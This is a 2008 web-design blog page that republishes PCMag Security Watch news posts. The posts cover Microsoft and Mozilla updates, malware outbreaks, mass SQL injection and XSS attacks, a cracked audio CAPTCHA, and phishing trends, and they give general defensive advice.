WCZone Web Design!Web Design, Security, and Networking Blog |
|
||||||||||
|
|
Office 2007 SP1 To Go On Automatic Updates June 16Posted by Security Watch - May 10, 2008 on 12:49 pm | In PCMag Security | No Comments The Office Sustained Engineering blog has announced that Office 2007 Service Pack 1, which has been available Since December 2007, will go out over Automatic Updates starting June 16. Users will receive the very large update over a sustained period of time. June 16 is merely the first date at which people will receive it this way. If you don't want to wait, you don't have to: Office 2007 Service Pack 1 may be downloaded through Microsoft Update at any time or directly from the Microsoft Download Center. (Warning, the direct download version is 218.3 MB.)
Free Firewall Aces PC Mag’s TestsPosted by Security Watch - May 9, 2008 on 3:35 pm | In PCMag Security | No Comments Looking for killer anti-malware software that'll keep your system clean from nearly all security threats and won't cost you a dime? ThreatFire 3.5 is does an outstanding job of preventing known and unknown malware from attacking a clean system. While standard signature-based antivirus/antispyware programs can't recognize a threat that's too new to have a signature, ThreatFire's sophisticated behavior analysis allows it to identify and eliminate all threats, both old and new. We tested it against other antivirus/antispyware apps and found it performed just as well as some of its popular, premium-priced rivals. In fact, its scores are among the highest we've ever seen, garnering it PC Mag's Editors' Choice Award. Read all about the product and the test results in the full review on PCMag.com. Post by Errol Pierre-Louis
Microsoft To Release 3 Critical, 1 Moderate Update Next WeekPosted by Security Watch - May 8, 2008 on 9:00 pm | In PCMag Security | No Comments Microsoft's Advance Notification for May, 2008 reveals that Patch Tuesday next week will bring 3 critical updates and one moderate one, The first critical vulnerability affects the Jet database engine in Windows 2000, Windows XP and Windows Server 2003, and is critical on all three. The second is for Microsoft Word in all current editions of Office from Office 2000 Service Pack 3 to Office 2007 Service Pack 1, including Office 2004 and 2008 on the Mac, the Word Viewer and Office Compatibility Pack, but it's only critical on Office 2000 Service Pack 3. The third critical vulnerability affects Publisher on all Windows editions of Office, but also is only critical Office 2000 Service Pack 3. One moderate vulnerability affects Windows Live Onecare, Microsoft Antigen, Windows Defender, Forefront Security and the Standalone System Sweeper. All the usual other updates will happen, including non-security updates and an update to the Malicious Software Removal Tool.
Acrobat Attacks Stepping UpPosted by Security Watch - May 8, 2008 on 12:44 pm | In PCMag Security | No Comments Symantec is reporting that Neosploit, a popular exploit toolkit, is beginning to carry attacks against vulnerabilities patched in Acrobat a few months ago. Even though we had already reported attacks in the wild for this, Symantec argues that these new exploits are especially dangerous because they "...will work reasonably silently through most browsers. If a user is enticed to a hostile Web site (who knows which ones are hostile these days) using the browser of their choice, it is reasonably likely that their computer will become infected provided that they have Acrobat installed on their computer.". Click here to get the latest version of Acrobat Reader. Full Acrobat versions are also affected.
McAfee Reports Widespread Fake Media File AttackPosted by Security Watch - May 8, 2008 on 11:48 am | In PCMag Security | No Comments McAfee is reporting a major outbreak of a Trojan named Downloader-UA.h. According to the stats from their customers' scans quite a few users are actually infected with it, and hundreds of thousands of PCs have reported detections. The Trojan is especially prevalent on peer-to-peer networks like Limewire. The Trojan is disguised as an MPG or MP3 file; the names and sizes vary quite a bit.. When the user attempts to launch it they are instead directed to download a file named PLAY_MP3.exe. If you run it, a EULA is displayed (this is all the rage among malware authors); agree to it and adware is installed on your system. A later McAfee blog entry has a video of the how the infection proceeds.
Vietnamese Firefox Distribution Carried MalwarePosted by Security Watch - May 8, 2008 on 8:59 am | In PCMag Security | No Comments Mozilla's Window Snyder (love that name) announced her Mozilla Security Blog that the Vietnamese language pack for Firefox 2 contains malicious code. They do scan for these things when uploaded, but such scans are more apt to miss malware when it's new. It wasn't detected for months. Everyone who downloaded the Vietnamese language Pack since February 18, 2008 has the infection. A new pack will be available soon, but in the interim Window recommends that users disable the current one using the Tools-addons dialog box. The malicious code is not itself a virus, but the handiwork of one. Someone involved in development had a virus infection and that virus modified the help files in this language pack to include malicious script that loads annoying windows and other such things. It cannot propagate from a Firefox users's PC, nor does it damage other content in any way.
Windows XP Service Pack 3 Actually ReleasedPosted by Security Watch - May 6, 2008 on 4:04 pm | In PCMag Security | No Comments I may have jumped the gun last time, but Microsoft has definitely made Windows XP SP3 available for download. The one-file network download is 316.4 MB. As Microsoft points out, if you're only updating one computer you are much better off using Windows Update, which should also be offering SP3. The download will be much smaller from there. The release had been delayed by a bug that affected users of Microsoft Dynamics Retail Management System, their point of sale solution. A hotfix is available for such users to apply prior to installing XP SP3. All that's the good news. The bad news is that if you click through to the actual download, the file request generates an HTTP 404 error—in other words it's not there. We have also heard reports of users unable to get at it through Windows Update, and also reports of successful downloads and it has shown up through Automatic Updates as well. In all likelihood this is a temporary problem either with Microsoft's servers or Akamai or something like that. It is also definitely available though Windows Software Update Services.
Malware Takes On Annoying Characteristics of “Legit” SoftwarePosted by Security Watch - May 5, 2008 on 3:20 pm | In PCMag Security | No Comments We're seeing reports of malware vendors including advertising (predictably, for other malware) in their own programs. We've also heard of malware authors attempting to assert intellectual property rights for their code. What's next, per-call support charges? Copy protection? The advertising isn't completely new, although it's certainly just as galling as the first time. And in the end it's unsurprising and even logical. Stranger is the equivalent of a EULA with an enforcement provision. Of course, malware authors are just as anxious as legit programmers to protect their products from copying. Symantec reported one botnet kit was being sold with an agreement stipulating that you couldn't copy it or resell it. Violate these rules and they—get ready for this—threaten to rat you out, with technical detail, to the anti-virus companies so that your network will be taken down. Of course, merchants like this can't go to the authorities to enforce their contracts, so it's not surprising that they would act like mobsters, or at least pretend to act like mobsters. They may as well have threatened to break your knees. Of course the story says that the cat's out of the bag on this and nobody has been ratted out to Symantec yet.
Google Audio CAPTCHA CrackedPosted by Security Watch - May 3, 2008 on 7:18 am | In PCMag Security | No Comments So much attention is paid to cracking graphical CAPTCHAs, and a lot of progress has been made in that field. Now Wintercore has come up with a smart breakthrough: analysis and automated cracking of audio CAPTCHAs. From early on it was noticed that graphical CAPTCHAs present a problem for the sight-impaired (what we would have called "blind" a few years ago). Out of common decency and perhaps to avoid legal problems for their products and services being inaccessible to the disabled, many CAPTCHA implementers started adding an audio option. In the case of the GMail signup page, for example, there is a small graphic of the universal disabled symbol of a character in a wheelchair next to the text field for the user to type. The title of the graphic, which would be spoken to a user with accessibility software, is "Listen and type the numbers you hear". Try it on GMail and listen to the sample. There is a woman's voice speaking numerals with a lot of creepy nonsense voice between the numerals. The nonsense sounds like backwards talking, reminiscent of The Exorcist or I Am The Walrus. Once spoken, the voice says "once again" and the numerals and nonsense repeat. The nonsense is disturbing enough that I suspect many people would have trouble hearing the numerals, but I suppose Google figured they had to do something to impede simple automated analysis. They didn't do enough. Wintercore did waveform analysis on the audio and noticed that the numeral portions were easily distinguishable from the nonsense parts. The rest is simple pattern recognition. Wintercore wrote a tool which they show a video of on the blog, demonstrating that the audio CAPTCHAs can be cracked with very high reliability, much better than what has been demonstrated with graphical ones. You'll note that the Wintercore blog is about 2 months old. It didn't get widespread notice until just recently when 0x000000.com, the hacker webzine, picked up on it. Wintercore ends with advice to Google by pointing out the biggest weaknesses in the CAPTCHA. I wonder whether the device is all that useful, because it sounds to me as if addressing them will make the CAPTCHA even more difficult for a human to understand. The current weak one is not easy.
Vulnerability Reported In MS WorksPosted by Security Watch - May 2, 2008 on 12:42 pm | In PCMag Security | No Comments BKIS Research from Vietnam is reporting a vulnerability in Microsoft Works versions 7 and 9, the latter of which is the current version. The flaw is in an ActiveX control shipped with the product and exploit HTML code is provided, but the flaw is characterized as local, meaning that it cannot be exploited from the web. BKIS shows a crash exploit and claims that it should be able to execute shellcode, but doesn't specifically claim that they have done so. This may be just a language problem, as the English in the report is awkward at times. The advisory also includes instructions on how to set the kill bit for the vulnerable control.
Thunderbird 2.0.0.14 ReleasedPosted by Security Watch - May 1, 2008 on 9:57 pm | In PCMag Security | No Comments When we announced the security and stability update in Firefox 2.0.0.14 a couple of weeks ago, we noted that the update affected Thunderbird as well. We also noted that the Thunderbird update that fixed the bugs wasn't yet available. The same was true of the updates fixed in Firefox 2.0.0.13. It's available now, according to the Mozilla Developer Center. New versions of Thunderbird for Windows, Mac and Linux may be found at www.getthunderbird.com, and appears to fix three vulnerabilities revealed since March. You can download it directly from the www.getthunderbird.com site, or use the Check Updates feature or wait for the automatic update to happen.
BBC Reports Facebook VulnerabilityPosted by Security Watch - May 1, 2008 on 10:18 am | In PCMag Security | No Comments The BBC is reporting that they have discovered a flaw in the Facebook social networking site that could compromise user privacy. The problem, reported on the BBC technology program Click, appears to be in the site's application model. Facebook allows users to write applications, but Click found that these applications could gather personal profile information on users or their friends. This data includes some of the information you provide to Facebook as part of your personal profile. The BBC was unclear on what profile elements could and could not be obtained, but they indicate that it's more than is proper. At first glance it's not clear how much of a scandal there is here. When you add an application in Facebook you are asked to approve certain capabilities for the application, among them that it "Know who I am and access my information". Further explanation for this option states:Granting access to information is required to add applications. If you are not willing to grant access to your information, do not add this application.Not much room to maneuver here. You want the application, you give the information. So the point of the BBC report is that this is built into the Facebook model and that users may not appreciate that they are giving up as many details as they think. Facebook deals with this on the one hand by warning users to be careful about adding applications, which is useless boilerplate because there are no real guidelines for how they might exercise such caution. On the other hand, their terms of service prohibit abuse of others' personal information. To make matters worse, applications may be running in part on 3rd party servers, making the enforcement of Facebook's terms even sketchier. The BBC says that Facebook "... also advises users to use the same precautions while downloading software from Facebook applications that they use when downloading software on their desktop." This exposes the emptiness of the whole endeavor. If Facebook applications are to be considered as potentially dangerous as desktop applications then they need more security facilities.
Why Do Browsers Trash My Data?Posted by Security Watch - May 1, 2008 on 12:03 am | In PCMag Security | No Comments It's happened to all of us: You fill out a web form with a lot of data and click a button and... your data is gone and nothing happened. The back button doesn't fill it out again. Well, most of the time it doesn't. VeriSign's Phillip Hallam-Baker asks why this is. He doesn't answer his own question, but merely poses this as a usability problem which has been ignored by browser authors for years. But in fact it's a feature of browsers which are, by default, "stateless." Special exceptions have been added here and there; as Hallam-Baker notes, browsers remember passwords, which are a special HTML field type. But adding the ability to remember field values as part of the browser history would probably open up many cans of worms. It's a sign of conservativeness that years of security vulnerabilities have beaten into browser authors that problems like this remain.
Must You Install Zango?Posted by Security Watch - May 1, 2008 on 12:00 am | In PCMag Security | No Comments Infamous adware vendor Zango, known as much for their legal troubles as for their misleading practices, still remains in business. Sunbelt Software has written lately of Zango sites they have observed. These are sites which push Zango software and receive money in return. Sunbelt has found one which claims to require that you install Zango in order to view the site, but the requirement is easily bypassed. On other sites, the requirement is enforced. In another post, they promo a screen saver that sends the Zango home site down in flames. All this is amusing from afar, but the moral of the story is that Zango never was trustworthy software and remains that way.
Free Beta For F-Secure Home Server SecurityPosted by Security Watch - April 30, 2008 on 11:58 pm | In PCMag Security | No Comments Do you use Windows Home Server? In spite of one nasty, if rare bug, I think it's a great product that makes home networks much better organized and secure. Now F-Secure has opened up their beta for a security add-in product for Windows Home Server. It automatically scans files for malware when they are written to or accessed from a Windows Home Server. Scheduled scans can also be set. If you provide good feedback F-Secure will give a free 12-month subscription when the product ships.
You might wonder whether it's wise to run a beta security product, and normally I wouldn't. I enthusiastically signed up for this one because I see fewer opportunities for application conflicts on a Windows Home Server than on a normal Windows desktop. And F-Secure makes excellent security products with malware detection among the very best. I've been running it for a few days now and sense no problems. You've got to decide what you're comfortable with though. WHS does make a good point at which to add a second AV product and scanner to your work, especially in as much as F-Secure uses multiple engines in their product.
New Windows Utility Claims To Bypass UACPosted by Security Watch - April 28, 2008 on 4:01 pm | In PCMag Security | No Comments The authors of iReboot, a program that sets which OS you want to reboot into, thought they were really clever when they rewrote their program so that Vista users didn't have to go through a UAC (User Access Control) check every time they ran it. Instead what they did was to make they users' systems vulnerable to attack betray their inexperience with Windows programming. The authors had a classic bad Windows program to begin with, in that it required Administrator access, but their in accurate assumption was that everyone on XP runs as Administrator anyway. On Vista the default is different, and even Administrators have to click a button to continue when executing privileged actions. So they rewrote their program into two halves, one a user mode interface, and the other a Windows service running in a privileged user context such as SYSTEM. The two communicate using standard IPC (interprocess communications). They view what they did as programming around UAC, but it's not as clever as they think. In fact, the installer for their program required Administrator access and the user has to consent through Administrator access to the installation of a service like this. This means that the user has to trust the program that they install in this case, whether it's a legitimate service or malware. Now by the same token, what they've done is the right way to write such a program. If you need to perform privileged actions you should separate them into a secure process, but you need to take proper precautions to secure the interface with that process. The facilities for making it secure, such as user impersonation, are rich and well-understood. In fact, the program's authors later describe, in a comment to the same blog entry, how they used .NET to create the IPC mechanism and how it was really easy and powerful, I read all the time of people becoming inpatient with UAC, but it's there for a good reason. Even if it's not an actual security boundary, it reminds you that something potentially dangerous is happening on the system and you should consider whether you really want to do it. I run it on all my Vista systems; it doesn't happen very often and I don't resent it when it does. If it's happening all the time to you, maybe you need to think about how you're using your computer.
Phishers Move Into MalwarePosted by Security Watch - April 28, 2008 on 3:56 pm | In PCMag Security | No Comments The most famous tool used for building phishing sites is called Rock Phish, It's well-known for making professional-looking sites, but now it has added malware to its arsenal. Originally reported by RSA, the kit has added data-stealing malware, the Zeus Trojan. Zeus itself is a kit one can buy, The trojan installs through the usual collection of vulnerabilities and user tricks. Mixing phishing and malware is not entirely new, but it seems to be a trend. Just recently Trend Micro reported on phishing e-mails, also generated by Rock Phish, which push malware disguised as a "digital certificate." The bottom line from this attack is the usual advice users get: Be very careful about clicking links in e-mails, and keep your anti-malware definitions up to date.
HackerTeen Comic Teaches Ethical HackingPosted by Security Watch - April 28, 2008 on 3:53 pm | In PCMag Security | No Comments
O'Reilly Media is famous as a publisher of books with über-geeky content on the inside and peculiar animals on the cover. With HackerTeen: Internet Blackout Volume 1 (O'Reilly, US $19.99) they've taken a completely new direction. Written by Marcel Marques and the HackerTeen team, it's a graphic novel aimed at entertaining teens while teaching them about Internet security and hacker ethics. HackerTeen is actually an educational project in Brazil that teaches "computer network security, entrepreneurship on the Internet, and hacker ethics". To accomplish this aim it uses a variety of tools including Role Playing Games and comics. Students who master the online courses can advance their skill level through a series of six belts: white, yellow, green, blue, brown and black. According to the site the teaching includes a psychological accompaniment and makes use of Paolo Freire's non-traditional educational methods. But don't try to sign up just yet - at present the distance learning courses are all in Portuguese and all classroom instruction takes place in São Paulo, Brazil. It's not cheap, either; each belt level requires four payments of $200 to $390. I submitted the book for analysis by an expert on graphic novels and teen attitudes - my 13-year-old son. He devoured the story, enjoyed it, and asked for volume 2 (alas, it's not yet available). But he wasn't pleased with the price. Twenty bucks, he informed me, would buy a lot more manga-style entertainment in the form of a new Usagi Yojimbo book or two Ranma ½ books. Well, I'm sure O'Reilly expects that parents, not teens, will buy the book.
Mass Web Server Hack Through SQL InjectionPosted by Security Watch - April 27, 2008 on 3:32 pm | In PCMag Security | No Comments A massive hack of web servers is underway, perhaps involving hundreds of thousands of Windows web servers. The servers themselves are then altered to serve attack code against client systems. Contrary to an initial report that a newly-reported Windows vulnerability was being exploited to compromise the web sites, it appears that no Windows vulnerability is at issue here. The sites are being compromised through "SQL injection." SQL injection is an attack technique used against web sites with database back-ends. It's common, for example, for web sites to take input from users, such as name, address and phone number, and enter that into a database. With SQL injection the attacker enters field values that contain SQL commands in an attempt to trick the database engine into executing them. In this case, the site is then reprogrammed to serve Javascript attacks to clients. Usually, SQL injection requires some knowledge of the database structure and trial and error, but these attackers seem to have found a generic way to "pollute" any Microsoft SQL Server without any such specific knowledge. See this FAQ on the attack at Hackademix.net for technical elaboration on the attack. The problem in web sites that have been hacked comes down to sloppy programming in the ASP and ADO/ADO.NET code. Unfortunately it's necessary these days to check user inputs for such tricks, even though this isn't something that occurs to many programmers. The scale of this attack is such that Microsoft may need to come out with a cleaning tool for users and other tools to help prevent it in the future.
Automatic distribution of Windows Vista SP1 begins todayPosted by Security Watch - April 23, 2008 on 9:02 pm | In PCMag Security | No Comments Microsoft announced that starting today, Windows Vista Service Pack 1 is being distributed over Windows Update through the Automatic Updates feature. English, French, German, Spanish, and Japanese Windows versions are affected. Others will follow later, but they are available now on the Microsoft Download Center. If you have Automatic Updates enabled, as is the default, SP1 will download in the background. When the download is done you will get a tool tip in from the tray that says that "New updates are available." Click on the tip and follow some prompts and it will install. The process of getting to everyone through Automatic Updates could take some time, so don't be surprised if it doesn't happen quickly.
Government Sites Hit With JavaScript AttacksPosted by Security Watch - April 23, 2008 on 5:17 pm | In PCMag Security | No Comments Attack campaigns against web sites are nothing new, but a recent one has targeted many government web sites, including some in the United Kingdom. The attacks are JavaScript Injection attacks. Web pages on the sites are modified by the attack so that users surfing them receive attack code that comes directly from a site they probably trust. The attacks are the usual grab bag of client attacks against old, long-patched vulnerabilities, but which will probably be successful in many cases. At least 20,000 sites have been compromised, including "a civil service recruitment site belonging to the UK government, a United Nations events site and several high-traffic tourism portals." Your best defense as a web user is the keep your system patched and up to date.
ISP Subscriptions and the Right To PrivacyPosted by Security Watch - April 23, 2008 on 4:53 pm | In PCMag Security | No Comments The New Jersey Supreme Court has held that, under the Constitution of the (great) state of New Jersey, "citizens have a reasonable expectation of privacy in the subscriber information they provide to Internet service providers." The opinion was unanimous. The decision, State of New Jersey v. Shirley Reid, concerned a disgruntled employee's (Reid's) abuse of her employer's computers. Someone changed passwords on a system remotely. Armed with the IP address of the remote user and the employer's assertion that Reid was the only one with the requisite knowledge of the systems to perform the change, the police obtained the subscriber information associated with that address from Comcast under a Municipal subpoena. The subpoena was defective for using the case name "Timothy C. Wilson, Plaintiff, vs. Shirley Reed [sic], Defendant" (Wilson was her employer), even though no such case pending. The court held the seizure of the information unreasonable under the New Jersey Constitution which reads, in the relevant section (Article I, Section 7):The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated; and no warrant shall issue except upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched and the papers and things to be seized.If that sounds familiar, it's because it's word-for-word the exact same language as the Fourth Amendment to the United States Constitution. Interestingly, the opinion notes that Federal Courts have not found such a right with respect to ISP subscription data, but that New Jersey law has been stronger in it's protections of consumer subscription data. It also noted that the police could still obtain the data through legitimate procedures, specifically a grand jury subpoena. If you don't like the weak protections available in Federal courts, you can always move to New Jersey. Our real estate prices could use your support.
Retroactive Patches For XP SP3Posted by Security Watch - April 22, 2008 on 11:13 pm | In PCMag Security | No Comments It's no less ironic for being logical: Microsoft today revised one of the most recent Patch Tuesday's bulletins to account for Windows XP SP3. In MS08-024 (Cumulative Security Update for Internet Explorer) version 2.0 of the bulletin was released to announce that Internet Explorer 7 on Windows XP SP3 is an affected component. (Personally, I think they should have called the new bulletin version 1.0 SP1.) Given that the patch and SP3 were being finalized at about the same time it's only reasonable that Microsoft had to leave the new patch out of the service pack so that the service pack could be effectively tested. Still funny though. The update to MS07-040 (Vulnerabilities in .NET Framework Could Allow Remote Code Execution), issued in July 2007, is a little more complicated. The various .NET Framework versions are added as affected components under XP SP3, and it's further stated that this is a detection update only; the patch itself is unaffected. But why is this an issue at all? Why didn't SP3 include this update itself? Perhaps it's because the .NET Framework is not a mandatory Windows component. It's possible that a user could have an XP SP3 system with no .NET on it and then install those .NET versions, thus being vulnerable. This stuff can be complicated.
XP SP3 Is OutPosted by Security Watch - April 21, 2008 on 9:30 pm | In PCMag Security | No Comments Have you been waiting up nights for it? Windows XP Service Pack 3 has been released. Click here for the download page. Click here for the release notes. XP SP3 is largely a roll-up of earlier service packs and updates. There are a few improvements and even a new feature or two, but for most users who regularly apply fixes from Windows Update it adds nothing as such. It looks like only the US English, Japanese and German versions are available as I write this. The update is not yet available on Windows Update. SP3 can be installed on top of XP SP1 or SP2, but not, it seems, SP0 (Windows XP with no service packs). Because not everyone wants to install it, Microsoft did not include Internet Explorer 7 in SP3. You are free to install it separately if you wish. Many other new features which have been released since XP SP2 are included, such as MMC (Microsoft Management Console) 3.0, MSXML 6. and WPA2 (Wi-Fi Protected Access). Several new features, some security-related, are included. There are improvements in the detection of "black hole routers," which are routers that silently discard packets. SP3 also includes support for Microsoft's NAP or Network Access Protection. NAP is roughly similar to Cisco's NAC, and both pre-qualify a client to access a network in terms of configuration, e.g. whether certain patches are applied or anti-virus updates are up-to-date. The Security Options Control Panel Applet has more explanatory text for its settings. There are also improvements to the Microsoft Kernel Mode Cryptographic Module and Windows Product Activation.
A Hack We Can Believe InPosted by Security Watch - April 21, 2008 on 7:34 pm | In PCMag Security | No Comments Hackers redirected portions of the BarackObama.com web site to HillaryClinton.com, according to several reports. It's amazing more of this sort of thing hasn't happened already, especially since web-based donations are more important than ever to the campaigns. Four years ago Security Watch reported on a phishing e-mail that asked for donations to the John Kerry campaign. The Obama hack used a cross-site scripting flaw in the site to redirect users from Obama's Community Blogs section to HillaryClinton.com. XSS bugs are getting far more attention lately than they had been in the past, perhaps because they are so widespread. And since the answer to them is good programming practices rather than running some security product, they can be difficult to snuff out.
Apple Tweaks Software Update ProgramPosted by Security Watch - April 18, 2008 on 10:51 am | In PCMag Security | No Comments After taking a beating for it here and elsewhere, Apple has changed their tactics for the ASU (Apple Software Update) program. What got the controversy going was when the Safari browser for Windows was released, and Apple advertised it in the ASU along with bug fixes as an "update," and defaulted to installing it. They have taken the same approach in the past with iTunes. Several days ago a new version of ASU was sent out through the ASU itself and the approach is different. Now new programs, a version of which the user does not already have installed, are put in a separate section and labeled explicitly as "New Software." They are still checked on by default though. Here's what it looks like:
Ryan Naraine in eWEEK describes the thinking of the developers in making these changes, and some other nuances in how the program behaves differently.
Whale PhishingPosted by Security Watch - April 18, 2008 on 10:36 am | In PCMag Security | No Comments One of the things I love about cutting-edge technology is the way we get to invent fun, new terminology. It seems to have been around before, but I just came across my first reference to "whale phishing." It describes a phish where the target is a very important person, such as a CEO, i.e. a very big target. An example of the phenomenon was written up in this Internet Storm Center writeup which describes a phony subpoena request sent to several CEOs, purportedly from the US Courts. It was further written up by McAfee, including a screen shot, in their blog. The recipient is give a link to click on; if they do so, they are asked to install a "browser plug-in" in order to view the document; the file is named Acrobat.exe. If they do so, they are served with malware which McAfee classifies as TROJ_AGENT.AMAL. Of course, the US Courts don't e-mail subpoena requests directly to CEOs.
PayPal Plans to Ban Unsafe Browsers - Including Safari?Posted by Security Watch - April 18, 2008 on 9:36 am | In PCMag Security | No Comments In a whitepaper entitled "A Practical Approach to Managing Phishing", PayPal has announced their approach to phishing, including banning users from performing sensitive transactions using browsers which do not have adequate protections against phishing. We've previously reported that PayPal considers Safari to be insecure for exactly these reasons. Ergo, it would seem that PayPal is planning to disallow the use of Apple's Safari for transactions. See Ryan Naraine's story in eWEEK for more information on these developments.
Mysterious Privilege Escalation Bug in WindowsPosted by Security Watch - April 18, 2008 on 8:17 am | In PCMag Security | No Comments In an advisory lacking in details, Microsoft is reporting a privilege escalation vulnerability in many, perhaps all, versions of Windows. The bug requires attack code to be executed in the context of the NetworkService or LocalService accounts. The program could then gain access to resources in other processes running as NetworkService or LocalService, and possibly elevate it's privileges to LocalSystem. The advisory seems most concerned with web hosting contexts, perhaps out of concern that user-submitted code could escape privilege limitations and compromise other users' sites. The advisory says that "User-provided code running in IIS, for example ISAPI filters and extensions, and ASP.NET code running in full trust may be affected by this vulnerability." But more common configurations are not affected by it, such as: Default Installations of IIS 5.1, IIS 6.0, and IIS 7.0", ASP.NET configured to run with a trust level lower than Full Trust, Classic ASP code." The "out of band" advisory shows that Microsoft is concerned about the problem. It refers to "public reports" of the problem, but we have not yet identified these. Update: It appears that the public reports were this incident from several weeks ago. If Microsoft's account of the limitations of the attack are accurate then the language used by Cesar Cerrudo, founder and Chief Executive Officer of Argeniss Information Security, who announced the vulnerability and discussed it yesterday in Dubai, are overstated.
Four Bugs Fixed In Safari UpdatePosted by Security Watch - April 16, 2008 on 9:13 pm | In PCMag Security | No Comments Four more vulnerabilities in Apple's Safari browser on both Windows and Mac OS X were fixed in an update today. Two of the vulnerabilities could allow arbitrary code execution. One of the others, which could allow a malicious site to control the address bar on Windows, was publicly disclosed last June. The last could allow cross-site scripting. The Apple Software Update program will bring Safari to version 3.1.1 with this update.
Firefox Update Fixes Crash BugPosted by Security Watch - April 16, 2008 on 8:49 pm | In PCMag Security | No Comments An earlier Firefox security fix (MFSA 2008-15—Crashes with evidence of memory corruption) introduced a stability problem, causing the browser to crash some times during Javascript garbage collection. The nature of these crashes was such that they might be exploitable. This problem was fixed in MFSA 2008-20, which brings Firefox to version 2.0.0.14. Thunderbird and SeaMonkey are also affected, although Thunderbird is only affected if the user changes the default setting whereby Javascript is disabled in HTML e-mails. As has usually been the case lately, while the advisory announced a new Thunderbird 2.0.0.14, the latest available version on the Mozilla site is 2.0.0.12.
XP SP3 Set For April 29 DebutPosted by Security Watch - April 16, 2008 on 5:17 pm | In PCMag Security | No Comments There's no official word from Microsoft, but Neowin is reporting a schedule for the release of Windows XP SP3. The schedule, as reported, is thus:
11 Critical Security AppsPosted by Security Watch - April 15, 2008 on 12:50 pm | In PCMag Security | No Comments
If your computer has no Internet connection and you never install software, it's probably safe from attack by viruses and such--as long as you don't plug in a virus-infested photo frame. Oops! And face it, if you're reading this, you're connected to the Internet with all its marvels and horrors. If you haven't secured your PC, it's an Internet mugging waiting to happen. Don't know how? Don't know what software to use? That's no excuse! Check out PC Magazine's "11 Critical Security Apps" to learn how you can keep the bad guys out. And keep reading PC Magazine's security coverage. The bad guys are constantly changing their attacks, the security vendors do their best to stay ahead, and you need to keep informed.
Urgency Raised For Recent Microsoft VulnerabilityPosted by Security Watch - April 14, 2008 on 6:12 pm | In PCMag Security | No Comments In last Tuesday's Microsoft patch roundup we noted that one of the most serious bugs was MS08-021, which has two buffer overflows in GDI, the graphical subsystem for Windows. Proof of concept exploit code for this attack has been released, and there are reports of active exploits in the wild, raising the urgency that users apply the patch. The published proofs of concept only exploit successfully on Windows 2000 SP4, not Windows XP, but it's safe to assume that this will change. MS08-021 describes bugs in the loading of EMF and WMF files. Since the original bulletin Microsoft has added an effective workaround: a registry hack that disables all metafile processing. Go to the advisory for details. Making this change might have serious consequences to your use of the system...or it might not. It's up to you, but all things considered it's probably safer to apply the patch than the workaround.
Cross-Site Scripting Bug In Google Spreadsheets Exposed IE User DataPosted by Security Watch - April 14, 2008 on 12:03 pm | In PCMag Security | No Comments Via Netcraft, researcher Billy (BK) Rios has reported a vulnerability in the Google Spreadsheets service which could allow cross-site scripting access to other Google services. The scenario is a bit of a stretch. If a user exports a spreadsheet to CSV format, Google emits it with a text/plain Content-type. But of the sheet itself contains any HTML, IE "sniffs" the format type as HTML and renders it. This means that the code in the cells executes in the google.com domain. Since all Google cookies are good across all their services, this could give open access. Google has fixed the problem.
Calendar SpamPosted by Security Watch - April 11, 2008 on 6:01 pm | In PCMag Security | No Comments The Washington Post Security Fix blog is reporting that spammers are now using the calendar features of Google Calendar and Microsoft Outlook to assist their efforts. As the Post points out, reports of this have been coming in for weeks (see here, here and here for example). Generally the pathology of it is that you receive a meeting request, you delete it because it's spam, but the stupid meeting shows up in your calendar anyway! And the meeting description itself is just the usual spam blabber. Click here to see a screen shot of a 419 message that came in this way. The problem seems to be that the calendar software defaults to reserving the meeting, or at least blocking out the time for it. Google's response and explanation tells the user how to reconfigure the calendar so that this doesn't happen. To make Outlook not automatically accept meeting requests (quoted from 10 tips on how to help reduce spam on Office Online):
One Million MalwarePosted by Security Watch - April 11, 2008 on 2:35 pm | In PCMag Security | No Comments Symantec is claiming, according to the BBC, that the number of malware samples "in circulation" has exceeded one million. It's party time if you sell anti-malware protection. Viruses, trojan horses and other malware are like mutations. The vast majority die out without reproducing in any meaningful quantity. Symantec also says that the vast majority have been created in the last 12 months. The Symantec report also goes into the nature of all that malware, none of which is big news: Trojans are often used as a toe-hold in order to deliver other malware, the underground which creates all this is increasingly professional, etc. Not a whole lot of news, but it does give urgency to the need to move away from a signature-based anti-malware model.
Apple Adds Defensive Tactics To QuickTimePosted by Security Watch - April 10, 2008 on 9:16 am | In PCMag Security | No Comments Taking a tip from Microsoft, Apple has added several defensive security techniques to QuickTime in their recent security update to that product. As detailed in eWEEK, QuickTime now supports ASLR (Address Space Layout Randomization), stack checking and hardware NX support (only on Windows Vista). ASLR randomizes the order of program components in memory, impeding certain attack techniques. Stack checking adds markers to functions in order to detect certain buffer overflows. NX support, which will also be on by default in IE8, uses modern processor facilities to prevent program execution out of areas of memory tat should contain only data. On OS X fewer protections will be employed; just stack checking and function call hardening, which is also designed to stop some buffer overflows. One could easily argue that the Windows version of QuickTime is much more secure than the OS X version, especially on Vista. But in a follow-up to the same eWEEK article, Nathan McFeters of ZDNet did some research and found out that not all of the code in the new QuickTime is protected by ASLR, although most is. As McFeters and others quoted in both articles say, this is an undeniably good thing and we should applaud for Apple for it. One would hope that Safari would be next in line for such updates.
You Can Turn Off Apple’s Safari PromptPosted by Security Watch - April 9, 2008 on 10:52 pm | In PCMag Security | No Comments When I wrote about Apple pushing Safari for Windows through the Software Updates applet to users of their other Windows products, it seemed to me that there was no way to make it stop pushing the software. Turns out there is one. As a reader named Bairman, commenting on that post, pointed out, you can make the Software Updates applet stop pushing a program to you by selecting it and choosing Tools-Ignore Selected Updates from the menus. Me, I assumed that any such option would be on a right-click context menu and I never even noticed that the program has menus. The reactions of many others tells me I'm far from alone. I thought that Apple was famous for usability. But the important thing is that if you want it to stop pushing Safari (or iTunes) at you, you can do it.
Adobe Issues Critical Flash Player UpdatePosted by Security Watch - April 9, 2008 on 10:43 pm | In PCMag Security | No Comments Addressing 7 vulnerabilities going back many months, Adobe has released a critical update to the Flash player. Adobe Flash Player versions 9.0.115.0 and earlier, and 8.0.39.0 and earlier are vulnerable. The new version 9.0.124.0 implements the fixes and Adobe recommends that users download it from the Player Download Center and install it. The update addresses a variety of errors, including input validation errors, specifically a failure to handle maliciously crafted SWF files. It also addresses the potential for DNS rebinding attacks, privilege escalation, malicious HTTP headers and much more.
|
|
© 2007 WCZone.com © For Content Belongs To The Respective Authors. |
